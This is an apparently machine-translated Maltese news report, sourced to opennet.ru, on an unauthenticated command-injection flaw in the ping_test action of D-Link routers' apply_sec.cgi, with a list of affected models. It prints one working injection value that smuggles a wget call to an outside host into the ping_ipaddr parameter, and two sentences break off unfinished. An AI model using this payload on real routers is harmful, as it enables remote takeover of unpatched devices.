Fir-routers mingħajr fili D-Link
Interessanti, skont l-iżviluppaturi tal-firmware, is-sejħa "ping_test" għandha tiġi eżegwita biss wara l-awtentikazzjoni, iżda fir-realtà tissejjaħ fi kwalunkwe każ, irrispettivament mill-illoggjar fl-interface tal-web. B'mod partikolari, meta taċċessa l-iskript apply_sec.cgi u tgħaddi l-parametru "action=ping_test", l-iskritt jerġa' jidderieġi lejn il-paġna ta 'awtentikazzjoni, iżda fl-istess ħin iwettaq l-azzjoni assoċjata ma' ping_test. Biex tesegwixxi l-kodiċi, intużat vulnerabbiltà oħra f'ping_test innifsu, li jsejjaħ l-utilità ping mingħajr ma ċċekkja sew il-korrettezza tal-indirizz IP mibgħut għall-ittestjar. Pereżempju, biex issejjaħ l-utilità wget u tittrasferixxi r-riżultati tal-kmand "echo 1234" lil host estern, speċifika biss il-parametru "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Il-preżenza tal-vulnerabbiltà ġiet ikkonfermata uffiċjalment fil-mudelli li ġejjin:
- DIR-655 bil-firmware 3.02b05 jew aktar;
- DIR-866L b'firmware 1.03b04 jew aktar;
- DIR-1565 b'firmware 1.01 jew aktar;
- DIR-652 (l-ebda informazzjoni dwar verżjonijiet problematiċi tal-firmware hija pprovduta)
Il-perjodu ta 'appoġġ għal dawn il-mudelli diġà skada, għalhekk D-Link
Aktar tard ġie skopert li l-vulnerabbiltà kienet ukoll
Sors: opennet.ru